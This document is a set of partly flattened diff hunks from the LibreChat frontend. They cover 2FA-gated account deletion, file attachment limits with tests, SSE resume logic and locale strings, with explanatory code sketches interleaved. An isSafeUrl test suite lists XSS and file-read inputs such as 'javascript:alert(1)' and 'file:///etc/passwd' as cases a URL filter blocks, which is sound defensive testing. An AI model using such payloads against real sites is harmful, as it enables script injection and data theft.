{useBackup ? localize('com_ui_use_2fa_code') : localize('com_ui_use_backup_code')}
</button>
</div>
)}
{renderDeleteButton(handleDeleteUser, isDeleting, isLocked || !otpReady, localize)}
</div>
</OGDialogContent>
</OGDialog>
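The payload selection in `handleDeleteUser` above can be read as a small pure function: with 2FA enabled, a trimmed TOTP code is sent as `{ token }` and a backup code as `{ backupCode }`; otherwise no payload is sent. A sketch under that reading (`buildDeletePayload` and `DeleteUserPayload` are illustrative names, not part of the PR):

```typescript
// Hypothetical standalone version of the 2FA payload logic shown in the diff.
type DeleteUserPayload = { token: string } | { backupCode: string } | undefined;

function buildDeletePayload(
  needs2FA: boolean,
  otpToken: string,
  useBackup: boolean,
): DeleteUserPayload {
  const trimmed = otpToken.trim();
  // No 2FA, or no code entered yet: delete without a verification payload.
  if (!needs2FA || trimmed === '') {
    return undefined;
  }
  // Backup codes and TOTP codes travel under different keys.
  return useBackup ? { backupCode: trimmed } : { token: trimmed };
}
```

This mirrors why the mutation moved from `onMutate` to `onSuccess`: logout should only happen once the (possibly 2FA-gated) deletion actually succeeds.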


@@ -18,7 +18,7 @@ const mockEndpointsConfig: TEndpointsConfig = {
'Some Endpoint': { type: EModelEndpoint.custom, userProvide: false, order: 9999 },
};
const defaultFileConfig = mergeFileConfig({
endpoints: {
Moonshot: { fileLimit: 5 },
[EModelEndpoint.agents]: { fileLimit: 20 },
@@ -26,6 +26,8 @@ let mockFileConfig = mergeFileConfig({
},
});
let mockFileConfig = defaultFileConfig;
jest.mock('~/data-provider', () => ({
useGetEndpointsQuery: () => ({ data: mockEndpointsConfig }),
useGetFileConfig: ({ select }: { select?: (data: unknown) => unknown }) => ({
@@ -118,13 +120,16 @@ describe('AgentPanel file config resolution (useAgentFileConfig)', () => {
});
describe('disabled state', () => {
beforeEach(() => {
mockFileConfig = defaultFileConfig;
});
it('reports not disabled for standard config', () => {
render(<TestWrapper provider="Moonshot" />);
expect(screen.getByTestId('disabled').textContent).toBe('false');
});
it('reports disabled when provider-specific config is disabled', () => {
mockFileConfig = mergeFileConfig({
endpoints: {
Moonshot: { disabled: true },
@@ -135,8 +140,44 @@ describe('AgentPanel file config resolution (useAgentFileConfig)', () => {
render(<TestWrapper provider="Moonshot" />);
expect(screen.getByTestId('disabled').textContent).toBe('true');
});
it('reports disabled when agents config is disabled and no provider set', () => {
mockFileConfig = mergeFileConfig({
endpoints: {
[EModelEndpoint.agents]: { disabled: true },
default: { fileLimit: 10 },
},
});
render(<TestWrapper />);
expect(screen.getByTestId('disabled').textContent).toBe('true');
});
it('reports disabled when agents is disabled and provider has no specific config', () => {
mockFileConfig = mergeFileConfig({
endpoints: {
[EModelEndpoint.agents]: { disabled: true },
default: { fileLimit: 10 },
},
});
render(<TestWrapper provider="Some Endpoint" />);
expect(screen.getByTestId('disabled').textContent).toBe('true');
});
it('provider-specific enabled overrides agents disabled', () => {
mockFileConfig = mergeFileConfig({
endpoints: {
Moonshot: { disabled: false, fileLimit: 5 },
[EModelEndpoint.agents]: { disabled: true },
default: { fileLimit: 10 },
},
});
render(<TestWrapper provider="Moonshot" />);
expect(screen.getByTestId('disabled').textContent).toBe('false');
expect(screen.getByTestId('fileLimit').textContent).toBe('5');
});
});
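The tests above pin down a precedence order: a provider-specific file config wins over the agents endpoint config, which wins over the default. An illustrative sketch of that resolution rule (not the actual `useAgentFileConfig` implementation; names are assumptions):

```typescript
// Hypothetical resolution order matching the behavior the tests assert.
interface EndpointFileConfig {
  disabled?: boolean;
  fileLimit?: number;
}

function resolveFileConfig(
  endpoints: Record<string, EndpointFileConfig | undefined>,
  provider?: string,
): EndpointFileConfig {
  // A provider-specific entry takes priority when present,
  // even if the agents endpoint is disabled.
  if (provider != null && endpoints[provider] != null) {
    return endpoints[provider] as EndpointFileConfig;
  }
  // Otherwise fall back to the agents endpoint config, then the default.
  return endpoints['agents'] ?? endpoints['default'] ?? {};
}
```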


@@ -24,14 +24,14 @@ import {
type ColumnFiltersState,
} from '@tanstack/react-table';
import {
megabyte,
mergeFileConfig,
checkOpenAIStorage,
isAssistantsEndpoint,
getEndpointFileConfig,
fileConfig as defaultFileConfig,
} from 'librechat-data-provider';
import type { TFile } from 'librechat-data-provider';
import { MyFilesModal } from '~/components/Chat/Input/Files/MyFilesModal';
import { useFileMapContext, useChatContext } from '~/Providers';
import { useLocalize, useUpdateFiles } from '~/hooks';
@@ -86,7 +86,7 @@ export default function DataTable<TData, TValue>({ columns, data }: DataTablePro
const fileMap = useFileMapContext();
const { showToast } = useToastContext();
const { files, setFiles, conversation } = useChatContext();
const { data: fileConfig = null } = useGetFileConfig({
select: (data) => mergeFileConfig(data),
});
@@ -142,7 +142,15 @@ export default function DataTable<TData, TValue>({ columns, data }: DataTablePro
return;
}
if (endpointFileConfig.fileLimit && files.size >= endpointFileConfig.fileLimit) {
showToast({
message: `${localize('com_ui_attach_error_limit')} ${endpointFileConfig.fileLimit} files (${endpoint})`,
status: 'error',
});
return;
}
if (fileData.bytes >= (endpointFileConfig.fileSizeLimit ?? Number.MAX_SAFE_INTEGER)) {
showToast({
message: `${localize('com_ui_attach_error_size')} ${
(endpointFileConfig.fileSizeLimit ?? 0) / megabyte
@@ -160,6 +168,22 @@ export default function DataTable<TData, TValue>({ columns, data }: DataTablePro
return;
}
if (endpointFileConfig.totalSizeLimit) {
const existing = files.get(fileData.file_id);
let currentTotalSize = 0;
for (const f of files.values()) {
currentTotalSize += f.size;
}
currentTotalSize -= existing?.size ?? 0;
if (currentTotalSize + fileData.bytes > endpointFileConfig.totalSizeLimit) {
showToast({
message: `${localize('com_ui_attach_error_total_size')} ${endpointFileConfig.totalSizeLimit / megabyte} MB (${endpoint})`,
status: 'error',
});
return;
}
}
addFile({
progress: 1,
attached: true,
@@ -175,7 +199,7 @@ export default function DataTable<TData, TValue>({ columns, data }: DataTablePro
metadata: fileData.metadata,
});
},
[addFile, files, fileMap, conversation, localize, showToast, fileConfig],
);
const filenameFilter = table.getColumn('filename')?.getFilterValue() as string;
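The `totalSizeLimit` guard added above has one subtlety: when a file is re-attached, its existing size must be subtracted first so it is not counted twice. A standalone sketch of that accounting (`wouldExceedTotalSize` is a hypothetical name, not part of the PR):

```typescript
// Sum attached sizes, subtract the entry being re-attached (replacement,
// not addition), then compare the prospective total against the limit.
function wouldExceedTotalSize(
  attached: Map<string, { size: number }>,
  fileId: string,
  incomingBytes: number,
  totalSizeLimit: number,
): boolean {
  let currentTotalSize = 0;
  for (const f of attached.values()) {
    currentTotalSize += f.size;
  }
  // Re-attaching an existing file replaces it, so remove its old size first.
  currentTotalSize -= attached.get(fileId)?.size ?? 0;
  return currentTotalSize + incomingBytes > totalSizeLimit;
}
```

The "does not double-count size of already-attached file" test in the new spec exercises exactly this subtraction.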


@@ -0,0 +1,239 @@
import React from 'react';
import { render, screen, fireEvent } from '@testing-library/react';
import { FileSources } from 'librechat-data-provider';
import type { TFile } from 'librechat-data-provider';
import type { ExtendedFile } from '~/common';
import DataTable from '../PanelTable';
import { columns } from '../PanelColumns';
const mockShowToast = jest.fn();
const mockAddFile = jest.fn();
let mockFileMap: Record<string, TFile> = {};
let mockFiles: Map<string, ExtendedFile> = new Map();
let mockConversation: Record<string, unknown> | null = { endpoint: 'openAI' };
let mockRawFileConfig: Record<string, unknown> | null = {
endpoints: {
openAI: { fileLimit: 10, supportedMimeTypes: ['application/pdf', 'text/plain'] },
},
};
jest.mock('@librechat/client', () => ({
Table: ({ children, ...props }: { children: React.ReactNode }) => (
<table {...props}>{children}</table>
),
Button: ({
children,
...props
}: { children: React.ReactNode } & React.ButtonHTMLAttributes<HTMLButtonElement>) => (
<button {...props}>{children}</button>
),
TableRow: ({ children, ...props }: { children: React.ReactNode }) => (
<tr {...props}>{children}</tr>
),
TableHead: ({ children, ...props }: { children: React.ReactNode }) => (
<th {...props}>{children}</th>
),
TableBody: ({ children, ...props }: { children: React.ReactNode }) => (
<tbody {...props}>{children}</tbody>
),
TableCell: ({
children,
...props
}: { children: React.ReactNode } & React.TdHTMLAttributes<HTMLTableCellElement>) => (
<td {...props}>{children}</td>
),
FilterInput: () => <input data-testid="filter" />,
TableHeader: ({ children, ...props }: { children: React.ReactNode }) => (
<thead {...props}>{children}</thead>
),
useToastContext: () => ({ showToast: mockShowToast }),
}));
jest.mock('~/Providers', () => ({
useFileMapContext: () => mockFileMap,
useChatContext: () => ({
files: mockFiles,
setFiles: jest.fn(),
conversation: mockConversation,
}),
}));
jest.mock('~/hooks', () => ({
useLocalize: () => (key: string) => key,
useUpdateFiles: () => ({ addFile: mockAddFile }),
}));
jest.mock('~/data-provider', () => ({
useGetFileConfig: ({ select }: { select?: (d: unknown) => unknown }) => ({
data: select != null ? select(mockRawFileConfig) : mockRawFileConfig,
}),
}));
jest.mock('~/components/Chat/Input/Files/MyFilesModal', () => ({
MyFilesModal: () => null,
}));
jest.mock('../PanelFileCell', () => ({ row }: { row: { original: TFile } }) => (
<span>{row.original?.filename}</span>
));
function makeFile(overrides: Partial<TFile> = {}): TFile {
return {
user: 'user-1',
file_id: 'file-1',
bytes: 1024,
embedded: false,
filename: 'test.pdf',
filepath: '/files/test.pdf',
object: 'file',
type: 'application/pdf',
usage: 0,
source: FileSources.local,
...overrides,
};
}
function makeExtendedFile(overrides: Partial<ExtendedFile> = {}): ExtendedFile {
return {
file_id: 'ext-1',
size: 1024,
progress: 1,
source: FileSources.local,
...overrides,
};
}
function renderTable(data: TFile[]) {
return render(<DataTable columns={columns} data={data} />);
}
function clickFilenameCell() {
const cells = screen.getAllByRole('button');
const filenameCell = cells.find(
(cell) => cell.tagName === 'TD' && cell.textContent && !cell.textContent.includes('com_ui_'),
);
if (!filenameCell) {
throw new Error('Could not find filename cell with role="button" — check mock setup');
}
fireEvent.click(filenameCell);
return filenameCell;
}
describe('PanelTable handleFileClick', () => {
beforeEach(() => {
mockShowToast.mockClear();
mockAddFile.mockClear();
mockFiles = new Map();
mockConversation = { endpoint: 'openAI' };
mockRawFileConfig = {
endpoints: {
openAI: {
fileLimit: 5,
totalSizeLimit: 10,
supportedMimeTypes: ['application/pdf', 'text/plain'],
},
},
};
});
it('calls addFile when within file limits', () => {
const file = makeFile();
mockFileMap = { [file.file_id]: file };
renderTable([file]);
clickFilenameCell();
expect(mockAddFile).toHaveBeenCalledTimes(1);
expect(mockAddFile).toHaveBeenCalledWith(
expect.objectContaining({
file_id: file.file_id,
attached: true,
progress: 1,
}),
);
expect(mockShowToast).not.toHaveBeenCalledWith(expect.objectContaining({ status: 'error' }));
});
it('blocks attachment when fileLimit is reached', () => {
const file = makeFile({ file_id: 'new-file', filename: 'new.pdf' });
mockFileMap = { [file.file_id]: file };
mockFiles = new Map(
Array.from({ length: 5 }, (_, i) => [
`existing-${i}`,
makeExtendedFile({ file_id: `existing-${i}` }),
]),
);
renderTable([file]);
clickFilenameCell();
expect(mockAddFile).not.toHaveBeenCalled();
expect(mockShowToast).toHaveBeenCalledWith(
expect.objectContaining({
message: expect.stringContaining('com_ui_attach_error_limit'),
status: 'error',
}),
);
});
it('blocks attachment when totalSizeLimit would be exceeded', () => {
const MB = 1024 * 1024;
const largeFile = makeFile({ file_id: 'large-file', bytes: 6 * MB });
mockFileMap = { [largeFile.file_id]: largeFile };
mockFiles = new Map([
['existing-1', makeExtendedFile({ file_id: 'existing-1', size: 5 * MB })],
]);
renderTable([largeFile]);
clickFilenameCell();
expect(mockAddFile).not.toHaveBeenCalled();
expect(mockShowToast).toHaveBeenCalledWith(
expect.objectContaining({
message: expect.stringContaining('com_ui_attach_error_total_size'),
status: 'error',
}),
);
});
it('does not double-count size of already-attached file', () => {
const MB = 1024 * 1024;
const file = makeFile({ file_id: 'reattach', bytes: 5 * MB });
mockFileMap = { [file.file_id]: file };
mockFiles = new Map([
['reattach', makeExtendedFile({ file_id: 'reattach', size: 5 * MB })],
['other', makeExtendedFile({ file_id: 'other', size: 4 * MB })],
]);
renderTable([file]);
clickFilenameCell();
expect(mockAddFile).toHaveBeenCalledTimes(1);
expect(mockShowToast).not.toHaveBeenCalledWith(
expect.objectContaining({
message: expect.stringContaining('com_ui_attach_error_total_size'),
}),
);
});
it('allows attachment when just under fileLimit', () => {
const file = makeFile({ file_id: 'under-limit' });
mockFileMap = { [file.file_id]: file };
mockFiles = new Map(
Array.from({ length: 4 }, (_, i) => [
`existing-${i}`,
makeExtendedFile({ file_id: `existing-${i}` }),
]),
);
renderTable([file]);
clickFilenameCell();
expect(mockAddFile).toHaveBeenCalledTimes(1);
});
});


@@ -68,14 +68,14 @@ export const useRefreshTokenMutation = (
/* User */
export const useDeleteUserMutation = (
options?: t.MutationOptions<unknown, t.TDeleteUserRequest | undefined>,
): UseMutationResult<unknown, unknown, t.TDeleteUserRequest | undefined, unknown> => {
const queryClient = useQueryClient();
const clearStates = useClearStates();
const resetDefaultPreset = useResetRecoilState(store.defaultPreset);
return useMutation([MutationKeys.deleteUser], {
mutationFn: (payload?: t.TDeleteUserRequest) => dataService.deleteUser(payload),
...(options || {}),
onSuccess: (...args) => {
resetDefaultPreset();
@@ -90,11 +90,11 @@ export const useDeleteUserMutation = (
export const useEnableTwoFactorMutation = (): UseMutationResult<
t.TEnable2FAResponse,
unknown,
t.TEnable2FARequest | undefined,
unknown
> => {
const queryClient = useQueryClient();
return useMutation((payload?: t.TEnable2FARequest) => dataService.enableTwoFactor(payload), {
onSuccess: (data) => {
queryClient.setQueryData([QueryKeys.user, '2fa'], data);
},
@@ -146,15 +146,18 @@ export const useDisableTwoFactorMutation = (): UseMutationResult<
export const useRegenerateBackupCodesMutation = (): UseMutationResult<
t.TRegenerateBackupCodesResponse,
unknown,
t.TRegenerateBackupCodesRequest | undefined,
unknown
> => {
const queryClient = useQueryClient();
return useMutation(
(payload?: t.TRegenerateBackupCodesRequest) => dataService.regenerateBackupCodes(payload),
{
onSuccess: (data) => {
queryClient.setQueryData([QueryKeys.user, '2fa', 'backup'], data);
},
},
);
};
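The three mutations above share one mechanical change: the variables type widens from `void` to an optional request object, and `mutationFn` forwards it. A generic sketch of that shape (simplified, not the actual react-query types):

```typescript
// Simplified mutation-function shape; the real react-query types carry
// more generics (error, context) than shown here.
type MutationFn<TVariables, TData> = (variables: TVariables) => TData;

// Widen a service call so it can still be invoked with no argument
// (old behavior) or with an optional payload (new behavior).
function widenToOptionalPayload<TReq, TRes>(
  call: (payload?: TReq) => TRes,
): MutationFn<TReq | undefined, TRes> {
  return (payload) => call(payload);
}
```

Because the payload is `TReq | undefined`, existing call sites like `deleteUser(undefined)` keep compiling while new 2FA-aware callers can pass `{ token }` or `{ backupCode }`.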
export const useVerifyTwoFactorTempMutation = (


@@ -112,7 +112,7 @@ describe('useArtifactProps', () => {
expect(result.current.files['content.md']).toBe('# No content provided');
});
it('should provide react-markdown dependency', () => {
const artifact = createArtifact({
type: 'text/markdown',
content: '# Test',
@@ -120,7 +120,9 @@ describe('useArtifactProps', () => {
const { result } = renderHook(() => useArtifactProps({ artifact }));
expect(result.current.sharedProps.customSetup?.dependencies).toHaveProperty('react-markdown');
expect(result.current.sharedProps.customSetup?.dependencies).toHaveProperty('remark-gfm');
expect(result.current.sharedProps.customSetup?.dependencies).toHaveProperty('remark-breaks');
});
it('should update files when content changes', () => {


@@ -226,12 +226,12 @@ export default function useResumableSSE(
if (data.sync != null) {
console.log('[ResumableSSE] SYNC received', {
runSteps: data.resumeState?.runSteps?.length ?? 0,
pendingEvents: data.pendingEvents?.length ?? 0,
});
const runId = v4();
setActiveRunId(runId);
if (data.resumeState?.runSteps) {
for (const runStep of data.resumeState.runSteps) {
stepHandler({ event: 'on_run_step', data: runStep }, {
@@ -241,19 +241,15 @@ export default function useResumableSSE(
}
}
if (data.resumeState?.aggregatedContent && userMessage?.messageId) {
const messages = getMessages() ?? [];
const userMsgId = userMessage.messageId;
const serverResponseId = data.resumeState.responseMessageId;
let responseIdx = -1;
if (serverResponseId) {
responseIdx = messages.findIndex((m) => m.messageId === serverResponseId);
}
if (responseIdx < 0) {
responseIdx = messages.findIndex(
(m) =>
@@ -272,7 +268,6 @@ export default function useResumableSSE(
});
if (responseIdx >= 0) {
const updated = [...messages];
const oldContent = updated[responseIdx]?.content;
updated[responseIdx] = {
@@ -285,25 +280,34 @@ export default function useResumableSSE(
newContentLength: data.resumeState.aggregatedContent?.length,
});
setMessages(updated);
resetContentHandler();
syncStepMessage(updated[responseIdx]);
console.log('[ResumableSSE] SYNC complete, handlers synced');
} else {
const responseId = serverResponseId ?? `${userMsgId}_`;
const newMessage = {
messageId: responseId,
parentMessageId: userMsgId,
conversationId: currentSubmission.conversation?.conversationId ?? '',
text: '',
content: data.resumeState.aggregatedContent,
isCreatedByUser: false,
} as TMessage;
setMessages([...messages, newMessage]);
resetContentHandler();
syncStepMessage(newMessage);
}
}
if (data.pendingEvents?.length > 0) {
console.log(`[ResumableSSE] Replaying ${data.pendingEvents.length} pending events`);
const submission = { ...currentSubmission, userMessage } as EventSubmission;
for (const pendingEvent of data.pendingEvents) {
if (pendingEvent.event != null) {
stepHandler(pendingEvent, submission);
} else if (pendingEvent.type != null) {
contentHandler({ data: pendingEvent, submission });
}
} }
}
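The replay loop added above routes each pending event by shape: an object with an `event` field goes to the step handler, one with a `type` field goes to the content handler, and anything else is skipped. A standalone sketch of that dispatch (`routePendingEvent` is an illustrative name, not from the PR):

```typescript
// Minimal shape of a buffered SSE event for routing purposes.
type PendingEvent = { event?: string; type?: string };

function routePendingEvent(
  e: PendingEvent,
  handlers: { step: (e: PendingEvent) => void; content: (e: PendingEvent) => void },
): 'step' | 'content' | 'skipped' {
  // Run-step events (e.g. 'on_run_step') carry an `event` discriminator.
  if (e.event != null) {
    handlers.step(e);
    return 'step';
  }
  // Content deltas carry a `type` discriminator instead.
  if (e.type != null) {
    handlers.content(e);
    return 'content';
  }
  return 'skipped';
}
```

Replaying in arrival order after the SYNC snapshot lets deltas build on the synced content rather than on stale state, which is why the handlers are reset and re-synced first.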


@@ -372,6 +372,7 @@
"com_error_missing_model": "No model selected for {{0}}. Please select a model and try again.",
"com_error_models_not_loaded": "Models configuration could not be loaded. Please refresh the page and try again.",
"com_error_moderation": "It appears that the content submitted has been flagged by our moderation system for not aligning with our community guidelines. We're unable to proceed with this specific topic. If you have any other questions or topics you'd like to explore, please edit your message, or create a new conversation.",
"com_error_invalid_base_url": "The base URL you provided targets a restricted address. Please use a valid external URL and try again.",
"com_error_no_base_url": "No base URL found. Please provide one and try again.",
"com_error_no_user_key": "No key found. Please provide a key and try again.",
"com_error_refusal": "Response refused by safety filters. Rewrite your message and try again. If you encounter this frequently while using Claude Sonnet 4.5 or Opus 4.1, you can try Sonnet 4, which has different usage restrictions.",
@@ -639,6 +640,7 @@
"com_ui_2fa_generate_error": "There was an error generating two-factor authentication settings",
"com_ui_2fa_invalid": "Invalid two-factor authentication code",
"com_ui_2fa_setup": "Setup 2FA",
"com_ui_2fa_verification_required": "Enter your 2FA code to continue",
"com_ui_2fa_verified": "Successfully verified Two-Factor Authentication",
"com_ui_accept": "I accept",
"com_ui_action_button": "Action Button",
@@ -747,7 +749,9 @@
"com_ui_attach_error": "Cannot attach file. Create or select a conversation, or try refreshing the page.",
"com_ui_attach_error_disabled": "File uploads are disabled for this endpoint",
"com_ui_attach_error_openai": "Cannot attach Assistant files to other endpoints",
"com_ui_attach_error_limit": "File limit reached:",
"com_ui_attach_error_size": "File size limit exceeded for endpoint:",
"com_ui_attach_error_total_size": "Total file size limit exceeded for endpoint:",
"com_ui_attach_error_type": "Unsupported file type for endpoint:",
"com_ui_attach_remove": "Remove file",
"com_ui_attach_warn_endpoint": "Non-Assistant files may be ignored without a compatible tool",


@@ -1203,7 +1203,7 @@
"com_ui_upload_image_input": "Téléverser une image",
"com_ui_upload_invalid": "Fichier non valide pour le téléchargement. L'image ne doit pas dépasser la limite",
"com_ui_upload_invalid_var": "Fichier non valide pour le téléchargement. L'image ne doit pas dépasser {{0}} Mo",
"com_ui_upload_ocr_text": "Télécharger en tant que texte",
"com_ui_upload_provider": "Télécharger vers le fournisseur",
"com_ui_upload_success": "Fichier téléversé avec succès",
"com_ui_upload_type": "Sélectionner le type de téléversement",


@@ -39,7 +39,7 @@
"com_agents_description_card": "Apraksts: {{description}}",
"com_agents_description_placeholder": "Pēc izvēles: aprakstiet savu aģentu šeit",
"com_agents_empty_state_heading": "Nav atrasts neviens aģents",
"com_agents_enable_file_search": "Iespējot meklēšanu dokumentos",
"com_agents_error_bad_request_message": "Pieprasījumu nevarēja apstrādāt.",
"com_agents_error_bad_request_suggestion": "Lūdzu, pārbaudiet ievadītos datus un mēģiniet vēlreiz.",
"com_agents_error_category_title": "Kategorija Kļūda",
@@ -66,7 +66,7 @@
"com_agents_file_context_description": "Visi augšupielādētie faili tiek pilnībā pārveidoti tekstā un nekavējoties pievienoti aģenta pamata kontekstam kā nemainīgs saturs, kas pieejams visu sarunas laiku. Ja augšupielādētajam faila tipam ir pieejams vai konfigurēts OCR, teksta izvilkšana notiek automātiski. Šī metode ir piemērota gadījumos, kad nepieciešams analizēt visu dokumenta, attēla ar tekstu vai PDF faila saturu, taču jāņem vērā, ka tas ievērojami palielina atmiņas patēriņu un izmaksas.",
"com_agents_file_context_disabled": "Pirms failu augšupielādes, lai to pievienotu kā kontekstu, ir jāizveido aģents.",
"com_agents_file_context_label": "Pievienot failu kā kontekstu",
"com_agents_file_search_disabled": "Lai varētu iespējot meklēšanu dokumentos ir jāizveido aģents.",
"com_agents_file_search_info": "Kad šī opcija ir iespējota, aģents izmanto vektorizētu datu meklēšanu (RAG pieeju), kas ļauj efektīvi un izmaksu ziņā izdevīgi izgūt atbilstošu kontekstu tikai no būtiskākajām faila daļām, balstoties uz lietotāja jautājumu, nevis analizē visu failu pilnā apjomā.",
"com_agents_grid_announcement": "Rādu {{count}} aģentus {{category}} kategorijā",
"com_agents_instructions_placeholder": "Sistēmas instrukcijas, ko izmantos aģents",
@@ -126,7 +126,7 @@
"com_assistants_delete_actions_success": "Darbība veiksmīgi dzēsta no asistenta",
"com_assistants_description_placeholder": "Pēc izvēles: Šeit aprakstiet savu asistentu",
"com_assistants_domain_info": "Asistents nosūtīja šo informāciju {{0}}",
"com_assistants_file_search": "Meklēšana dokumentos",
"com_assistants_file_search_info": "Šī funkcija ļauj asistentam izmantot augšupielādēto failu saturu, pievienojot zināšanas tieši no lietotāja vai citu lietotāju failiem. Pēc faila augšupielādes asistents automātiski identificē un izgūst nepieciešamās teksta daļas atbilstoši lietotāja pieprasījumam, neiekļaujot visu failu pilnā apjomā. Vektoru datubāzu (vector store) pieslēgšana tieši šai funkcijai šobrīd nav atbalstīta; tās iespējams pievienot tikai Provider Playground vidē vai augšupielādējot failus sarunas pavedienam ikreizējai meklēšanai.",
"com_assistants_function_use": "Izmantotais asistents {{0}}",
"com_assistants_image_vision": "Attēla redzējums",
@@ -136,7 +136,7 @@
"com_assistants_knowledge_info": "Ja augšupielādējat failus sadaļā Zināšanas, sarunās ar asistentu var tikt iekļauts faila saturs.",
"com_assistants_max_starters_reached": "Sasniegts maksimālais sarunu uzsākšanas iespēju skaits",
"com_assistants_name_placeholder": "Pēc izvēles: Asistenta nosaukums",
"com_assistants_non_retrieval_model": "Šajā modelī meklēšana dokumentos nav iespējota. Lūdzu, izvēlieties citu modeli.",
"com_assistants_retrieval": "Atgūšana",
"com_assistants_running_action": "Darbība palaista",
"com_assistants_running_var": "Strādā {{0}}",
@@ -232,7 +232,7 @@
"com_endpoint_anthropic_thinking_budget": "Nosaka maksimālo žetonu skaitu, ko Claude drīkst izmantot savā iekšējā spriešanas procesā. Lielāki budžeti var uzlabot atbilžu kvalitāti, nodrošinot rūpīgāku analīzi sarežģītām problēmām, lai gan Claude var neizmantot visu piešķirto budžetu, īpaši diapazonos virs 32 000. Šim iestatījumam jābūt zemākam par \"Maksimālie izvades tokeni\".",
"com_endpoint_anthropic_topk": "Top-k maina to, kā modelis atlasa marķierus izvadei. Ja top-k ir 1, tas nozīmē, ka atlasītais marķieris ir visticamākais starp visiem modeļa vārdu krājumā esošajiem marķieriem (to sauc arī par alkatīgo dekodēšanu), savukārt, ja top-k ir 3, tas nozīmē, ka nākamais marķieris tiek izvēlēts no 3 visticamākajiem marķieriem (izmantojot temperatūru).", "com_endpoint_anthropic_topk": "Top-k maina to, kā modelis atlasa marķierus izvadei. Ja top-k ir 1, tas nozīmē, ka atlasītais marķieris ir visticamākais starp visiem modeļa vārdu krājumā esošajiem marķieriem (to sauc arī par alkatīgo dekodēšanu), savukārt, ja top-k ir 3, tas nozīmē, ka nākamais marķieris tiek izvēlēts no 3 visticamākajiem marķieriem (izmantojot temperatūru).",
"com_endpoint_anthropic_topp": "`Top-p` maina to, kā modelis atlasa marķierus izvadei. Marķieri tiek atlasīti no K (skatīt parametru topK) ticamākās līdz vismazāk ticamajai, līdz to varbūtību summa ir vienāda ar `top-p` vērtību.", "com_endpoint_anthropic_topp": "`Top-p` maina to, kā modelis atlasa marķierus izvadei. Marķieri tiek atlasīti no K (skatīt parametru topK) ticamākās līdz vismazāk ticamajai, līdz to varbūtību summa ir vienāda ar `top-p` vērtību.",
"com_endpoint_anthropic_use_web_search": "Iespējojiet tīmekļa meklēšanas funkcionalitāti, izmantojot Anthropic iebūvētās meklēšanas iespējas. Tas ļauj modelim meklēt tīmeklī jaunāko informāciju un sniegt precīzākas un aktuālākas atbildes.", "com_endpoint_anthropic_use_web_search": "Iespējojiet meklēšanu tīmeklī funkcionalitāti, izmantojot Anthropic iebūvētās meklēšanas iespējas. Tas ļauj modelim meklēt tīmeklī jaunāko informāciju un sniegt precīzākas un aktuālākas atbildes.",
"com_endpoint_assistant": "Asistents", "com_endpoint_assistant": "Asistents",
"com_endpoint_assistant_model": "Asistenta modelis", "com_endpoint_assistant_model": "Asistenta modelis",
"com_endpoint_assistant_placeholder": "Lūdzu, labajā sānu panelī atlasiet asistentu.", "com_endpoint_assistant_placeholder": "Lūdzu, labajā sānu panelī atlasiet asistentu.",
@ -1486,7 +1486,7 @@
"com_ui_version_var": "Versija {{0}}", "com_ui_version_var": "Versija {{0}}",
"com_ui_versions": "Versijas", "com_ui_versions": "Versijas",
"com_ui_view_memory": "Skatīt atmiņu", "com_ui_view_memory": "Skatīt atmiņu",
"com_ui_web_search": "Tīmekļa meklēšana", "com_ui_web_search": "Meklēšana tīmeklī",
"com_ui_web_search_cohere_key": "Ievadiet Cohere API atslēgu", "com_ui_web_search_cohere_key": "Ievadiet Cohere API atslēgu",
"com_ui_web_search_firecrawl_url": "Firecrawl API URL (pēc izvēles)", "com_ui_web_search_firecrawl_url": "Firecrawl API URL (pēc izvēles)",
"com_ui_web_search_jina_key": "Ievadiet Jina API atslēgu", "com_ui_web_search_jina_key": "Ievadiet Jina API atslēgu",


@@ -1,4 +1,72 @@
-import { getMarkdownFiles } from '../markdown';
+import { isSafeUrl, getMarkdownFiles } from '../markdown';
+
+describe('isSafeUrl', () => {
+  it('allows https URLs', () => {
+    expect(isSafeUrl('https://example.com')).toBe(true);
+  });
+  it('allows http URLs', () => {
+    expect(isSafeUrl('http://example.com/path')).toBe(true);
+  });
+  it('allows mailto links', () => {
+    expect(isSafeUrl('mailto:user@example.com')).toBe(true);
+  });
+  it('allows tel links', () => {
+    expect(isSafeUrl('tel:+1234567890')).toBe(true);
+  });
+  it('allows relative paths', () => {
+    expect(isSafeUrl('/path/to/page')).toBe(true);
+    expect(isSafeUrl('./relative')).toBe(true);
+    expect(isSafeUrl('../parent')).toBe(true);
+  });
+  it('allows anchor links', () => {
+    expect(isSafeUrl('#section')).toBe(true);
+  });
+  it('blocks javascript: protocol', () => {
+    expect(isSafeUrl('javascript:alert(1)')).toBe(false);
+  });
+  it('blocks javascript: with leading whitespace', () => {
+    expect(isSafeUrl(' javascript:alert(1)')).toBe(false);
+  });
+  it('blocks javascript: with mixed case', () => {
+    expect(isSafeUrl('JavaScript:alert(1)')).toBe(false);
+  });
+  it('blocks data: protocol', () => {
+    expect(isSafeUrl('data:text/html,<b>x</b>')).toBe(false);
+  });
+  it('blocks blob: protocol', () => {
+    expect(isSafeUrl('blob:http://example.com/uuid')).toBe(false);
+  });
+  it('blocks vbscript: protocol', () => {
+    expect(isSafeUrl('vbscript:MsgBox("xss")')).toBe(false);
+  });
+  it('blocks file: protocol', () => {
+    expect(isSafeUrl('file:///etc/passwd')).toBe(false);
+  });
+  it('blocks empty strings', () => {
+    expect(isSafeUrl('')).toBe(false);
+  });
+  it('blocks whitespace-only strings', () => {
+    expect(isSafeUrl(' ')).toBe(false);
+  });
+  it('blocks unknown/custom protocols', () => {
+    expect(isSafeUrl('custom:payload')).toBe(false);
+  });
+});
+
 describe('markdown artifacts', () => {
   describe('getMarkdownFiles', () => {
@@ -41,7 +109,7 @@ describe('markdown artifacts', () => {
       const markdown = '# Test';
       const files = getMarkdownFiles(markdown);
-      expect(files['/components/ui/MarkdownRenderer.tsx']).toContain('import Markdown from');
+      expect(files['/components/ui/MarkdownRenderer.tsx']).toContain('import ReactMarkdown from');
       expect(files['/components/ui/MarkdownRenderer.tsx']).toContain('MarkdownRendererProps');
       expect(files['/components/ui/MarkdownRenderer.tsx']).toContain(
         'export default MarkdownRenderer',
@@ -162,13 +230,29 @@ describe('markdown artifacts', () => {
   });

   describe('markdown component structure', () => {
-    it('should generate a MarkdownRenderer component that uses marked-react', () => {
+    it('should generate a MarkdownRenderer component with safe markdown rendering', () => {
       const files = getMarkdownFiles('# Test');
       const rendererCode = files['/components/ui/MarkdownRenderer.tsx'];
-      // Verify the component imports and uses Markdown from marked-react
-      expect(rendererCode).toContain("import Markdown from 'marked-react'");
-      expect(rendererCode).toContain('<Markdown gfm={true} breaks={true}>{content}</Markdown>');
